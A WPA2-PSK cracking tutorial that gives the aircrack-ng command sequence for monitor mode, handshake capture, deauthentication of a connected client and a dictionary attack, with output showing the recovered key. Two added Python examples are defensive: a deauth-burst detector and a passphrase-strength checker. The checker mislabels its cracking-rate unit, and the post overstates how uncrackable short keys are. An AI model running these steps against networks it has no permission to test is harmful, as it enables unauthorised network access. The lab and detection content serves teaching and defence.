1. Some background info
WPA stands for WiFi Protected Access and is a security protocol for protecting wireless networks. WPA and WPA2 were developed in response to the serious weaknesses discovered in WEP. For information on how to crack WEP encrypted access points see this post.
2. The task
In this post we will crack a WPA2 encrypted access point which uses a preshared key (PSK). For that we will use BackTrack, our trusty pentesting distribution.
3. What we need
- a laptop/PC with a wireless card that supports packet injection. Check on the Internet if your wireless card model supports this function;
- BackTrack 5, either as a live CD, live USB or installed on your computer. You can get the latest BackTrack image here;
- a wireless access point configured to use WPA2-PSK encryption;
- a client connected to the access point (another laptop/smartphone/etc.).
4. Let's begin
Open a terminal window.
First things first, we need to enable monitoring mode for our wireless card.
airmon-ng start wlan0
Now that our wireless card is properly set up, let's find our network. The following command will enumerate the wireless access points and clients in range and also provide us with useful information about them:
airodump-ng mon0
The output is something like this:
CH 13 ][ Elapsed: 4 s ][ 2014-01-29 14:08
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
80:1F:02:4B:F9:5C -45 8 0 0 11 54e WPA2 CCMP PSK Edimax AP
10:BF:48:92:A2:80 -87 5 0 0 1 54e WPA2 CCMP PSK ASUS
BSSID STATION PWR Rate Lost Frames Probe
80:1F:02:4B:F9:5C 60:D8:19:A7:33:21 -50 0 - 5e 0 1
The above output shows us that there are two access points in range, Edimax AP and ASUS, both using WPA2-PSK encryption.
We can also see that there is a wireless client with MAC address 60:D8:19:A7:33:21 connected to our target (MAC 80:1F:02:4B:F9:5C).
We're going to need that client: it is the exchange between the client and the access point that gives us the packets we will crack to recover the key.
Now that we know our target it's time to get to work. We're going to have airodump-ng capture packets from our target and write them to a .cap file.
The following command will do it
airodump-ng -w EdimaxCapture --bssid 80:1F:02:4B:F9:5C --channel 11 mon0
The idea here is to catch the so-called handshake. The handshake is a set of messages exchanged between the client and the access point which ends with the client being authenticated (assuming it has the right key). The thing is, the handshake only occurs when a client connects to the access point. So we have two options. We either wait for a new client to connect (not ideal) or we simply disconnect a connected client and let it reconnect. Since the second option sounds more interesting, let's do that. We're going to use aireplay-ng to send deauthentication (deauth) packets to the client.
Let's open a new terminal window and run this command:
aireplay-ng -a 80:1F:02:4B:F9:5C -c 60:D8:19:A7:33:21 --deauth 4 mon0
So we've sent 4 deauth packets to the client connected to the target. Time to get back to the terminal window capturing the packets and see if anything interesting was caught:
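From the defender's side, the deauth step above is the noisy part of the attack: a burst of deauthentication frames aimed at one client, sent by someone spoofing the access point's address, is exactly what a wireless IDS looks for. The following is an added example (not code from the original post or from the aircrack-ng project) of that detection logic. It runs over a constructed list of management-frame records; a real deployment would feed it frames parsed from a monitor-mode capture. The frame layout, the window of 2 seconds and the threshold of 3 frames are assumptions chosen for illustration. Where the hardware supports it, enabling 802.11w Protected Management Frames makes the access point and client drop unauthenticated deauth frames, so the attack fails rather than merely being detected.

```python
"""Flag bursts of 802.11 deauthentication/disassociation frames per
(transmitter, receiver) pair, in the style of a wireless IDS rule.

Added example, not part of the original post. Input records are a
constructed stand-in for frames parsed from a monitor-mode capture.
"""
from collections import defaultdict

# IEEE 802.11 management frame subtype values.
BEACON = 0x08
DISASSOC = 0x0A
DEAUTH = 0x0C

# Addresses taken from the tutorial's airodump-ng output; OTHER is a
# constructed second client used for the benign case.
AP = "80:1F:02:4B:F9:5C"
CLIENT = "60:D8:19:A7:33:21"
OTHER = "D8:50:E6:20:D1:07"

# Constructed frame log. Each record: capture time in seconds, frame
# subtype, transmitter address, receiver address, IEEE reason code.
SAMPLE_FRAMES = [
    {"ts": 0.00, "subtype": BEACON, "src": AP, "dst": "FF:FF:FF:FF:FF:FF", "reason": None},
    # One legitimate deauth: the AP drops an idle client (reason 4 = inactivity).
    {"ts": 1.50, "subtype": DEAUTH, "src": AP, "dst": OTHER, "reason": 4},
    # Four frames in 60 ms, "from" the AP to the connected client, matching
    # the tutorial's "--deauth 4" (reason 7 = class 3 frame from a
    # non-associated station, a code commonly seen in injected deauths).
    {"ts": 10.00, "subtype": DEAUTH, "src": AP, "dst": CLIENT, "reason": 7},
    {"ts": 10.02, "subtype": DEAUTH, "src": AP, "dst": CLIENT, "reason": 7},
    {"ts": 10.04, "subtype": DEAUTH, "src": AP, "dst": CLIENT, "reason": 7},
    {"ts": 10.06, "subtype": DEAUTH, "src": AP, "dst": CLIENT, "reason": 7},
    {"ts": 10.10, "subtype": BEACON, "src": AP, "dst": "FF:FF:FF:FF:FF:FF", "reason": None},
]


def detect_deauth_bursts(frames, window_s=2.0, threshold=3):
    """Return one alert per (src, dst) pair that carries at least
    `threshold` deauth/disassoc frames inside any `window_s` seconds.

    Each alert reports the peak number of frames seen in one window and
    the total number of deauth frames for that pair.
    """
    by_pair = defaultdict(list)
    for f in frames:
        if f["subtype"] in (DEAUTH, DISASSOC):
            by_pair[(f["src"], f["dst"])].append(f["ts"])

    alerts = []
    for (src, dst), stamps in by_pair.items():
        stamps.sort()
        peak, start = 0, 0
        # Sliding window: advance `start` until the window fits in window_s.
        for end, ts in enumerate(stamps):
            while ts - stamps[start] > window_s:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts.append({"src": src, "dst": dst, "peak": peak, "total": len(stamps)})
    # Worst offenders first.
    return sorted(alerts, key=lambda a: -a["peak"])


if __name__ == "__main__":
    for a in detect_deauth_bursts(SAMPLE_FRAMES):
        print(f"deauth burst: {a['src']} -> {a['dst']} "
              f"peak {a['peak']} frames, {a['total']} total")
```

The single inactivity deauth to the other client never reaches the threshold, so only the burst against the tutorial's client is reported. In practice the rule is tuned per network: a busy enterprise controller may legitimately send several deauths per second during roaming, so the window and threshold should be measured against a baseline capture before alerting on them.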
CH 11 ][ Elapsed: 9 mins ][ 2014-01-29 14:25 ][ WPA handshake: 80:1F:02:4B:F9:5C
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
80:1F:02:4B:F9:5C -39 100 5378 1155 2 11 54e WPA2 CCMP PSK Edimax AP
BSSID STATION PWR Rate Lost Frames Probe
80:1F:02:4B:F9:5C 60:D8:19:A7:33:21 -127 1e- 0e 0 655
Aha, seems like we caught a handshake for our target. Look at the top-right part of the output.
Now that we caught it we can stop this and start the actual cracking.
We are going to use a dictionary attack to attempt to find the password. This dictionary is merely a text file which contains one candidate string per line. This is where the tricky part comes in. For our attack to be successful, the key must be one of those strings. The internet is full of wordlists which you can try to use to crack a password. For the purpose of this tutorial I created a small wordlist which also contains the key for the access point.
Let's run the following command and see what comes up:
aircrack-ng -w wordlist.txt -a 2 -b 80:1F:02:4B:F9:5C EdimaxCapture-02.cap
One quick note: even though the -w argument for airodump-ng was EdimaxCapture, it created EdimaxCapture-02.cap, because airodump-ng appends a sequence number to the output file name. If you get an error when running aircrack saying that it cannot find the file, use the ls command to see what files are in the current folder.
If aircrack finds the key it will output this:
Aircrack-ng 1.1 r2178
[00:00:00] 6 keys tested (403.00 k/s)
KEY FOUND! [ Test1234 ]
Master Key : 0C 21 E6 27 23 1E AD 61 B5 29 BD FE 74 A0 89 C7
D4 77 88 92 78 D1 6D DD A8 4F 79 4A 34 32 1A 4D
Transient Key : BC 29 70 E1 CF 79 11 13 A8 BC 6A 5B 38 7E D8 C8
5F B0 51 24 51 A0 D8 6E C3 1E 8B 24 53 DD F6 A7
DF B1 71 6D 27 C5 23 55 9A 7C 17 4D C0 AC B2 27
BC 9E 72 98 C6 0E D2 6A 0E 22 49 16 19 CD 99 31
EAPOL HMAC : 30 0F 90 38 7C C2 21 4F 6A 2E 30 48 30 74 2C F6
Congratulations, you have just cracked the key.
BackTrack also provides other applications for cracking WPA. The most notable is Gerix (Exploitation Tools->Wireless Exploitation Tools->WLAN Exploitation->Gerix-wifi-cracker-ng) which offers an intuitive GUI and point-and-click navigation. Play around and experiment.
6. How to defend
This attack is easy to fend off because it relies on guessing the key. So use something that's hard to guess. An 8-character key with upper and lower case characters, symbols and numbers would be impossible to crack with this attack. More characters, better protection. Just don't go nuts with really long ones. I consider a 16-character key to be more than enough (something like d!4PfY#cM&35zt@5).
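To put numbers on the advice above, and on the dictionary attack described earlier, here is an added example (not code from the original post) that checks a candidate WPA2 passphrase the way a defender should: is it present in a wordlist, how large is the keyspace an attacker must cover, and how long would exhausting that keyspace take at the 403 k/s rate shown in the post's aircrack-ng output? The wordlist is a constructed stand-in for a file, the 80-bit "strong" threshold is an assumption, and the rate constant is the one figure the post itself provides.

```python
"""Assess a WPA2-PSK passphrase: wordlist membership, keyspace size and
worst-case exhaustive-search time at a given cracking rate.

Added example, not part of the original post. SAMPLE_WORDLIST and the
80-bit threshold are constructed/assumed values for illustration.
"""
import math
import string

# Keys tested per second, as reported by aircrack-ng in the post's run.
CPU_RATE = 403_000
SECONDS_PER_YEAR = 365 * 24 * 3600
STRONG_BITS = 80  # assumed threshold for calling a passphrase "strong"

# Constructed stand-in for a wordlist file (one candidate per line);
# it deliberately contains the tutorial's recovered key.
SAMPLE_WORDLIST = {"password", "12345678", "Test1234", "letmein1", "qwertyuiop"}


def charset_size(passphrase):
    """Size of the union of the character classes the passphrase uses."""
    size = 0
    if any(c.islower() for c in passphrase):
        size += 26
    if any(c.isupper() for c in passphrase):
        size += 26
    if any(c.isdigit() for c in passphrase):
        size += 10
    if any(c in string.punctuation for c in passphrase):
        size += len(string.punctuation)  # 32 printable ASCII symbols
    return size


def entropy_bits(passphrase):
    """Upper bound on guessing entropy: length * log2(alphabet size).

    This assumes every character was chosen uniformly at random; a
    passphrase built from words or patterns has far less real entropy.
    """
    return len(passphrase) * math.log2(charset_size(passphrase))


def exhaustive_years(passphrase, rate=CPU_RATE):
    """Years needed to try every string of the same length and alphabet."""
    keyspace = charset_size(passphrase) ** len(passphrase)
    return keyspace / rate / SECONDS_PER_YEAR


def assess(passphrase, wordlist=SAMPLE_WORDLIST, rate=CPU_RATE):
    """Return a verdict dict for the passphrase.

    A WPA2-PSK passphrase must be 8 to 63 printable ASCII characters, so
    anything outside that range is rejected before any other check.
    """
    if not 8 <= len(passphrase) <= 63 or not passphrase.isascii():
        return {"verdict": "invalid", "bits": 0.0, "years": 0.0}
    bits = round(entropy_bits(passphrase), 1)
    if passphrase in wordlist:
        # Entropy arithmetic is irrelevant once the key is in a wordlist:
        # aircrack-ng found the tutorial's key after testing 6 candidates.
        return {"verdict": "in wordlist", "bits": bits, "years": 0.0}
    years = exhaustive_years(passphrase, rate)
    verdict = "strong" if bits >= STRONG_BITS else "weak"
    return {"verdict": verdict, "bits": bits, "years": years}


if __name__ == "__main__":
    for pw in ("Test1234", "12345678", "Summer2014!", "d!4PfY#cM&35zt@5"):
        r = assess(pw)
        print(f"{pw:18} {r['verdict']:12} {r['bits']:6.1f} bits "
              f"{r['years']:.3g} years at {CPU_RATE} k/s")
```

The worst-case figures are a ceiling, not a guarantee: "Summer2014!" scores well on alphabet size yet is the kind of pattern that appears in real wordlists long before any exhaustive search would reach it. The reason the rate is as low as hundreds of thousands of keys per second on a CPU is that WPA2 derives the pairwise master key with PBKDF2-HMAC-SHA1 over 4096 iterations, salted with the SSID; that cost is the defender's friend, but it only helps when the passphrase is not in the attacker's list in the first place.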
7. What's next?
There is however a way to crack a WPA2-PSK encrypted access point no matter how strong the key is and that is through WPS (WiFi Protected Setup). We will cover this attack in the next post.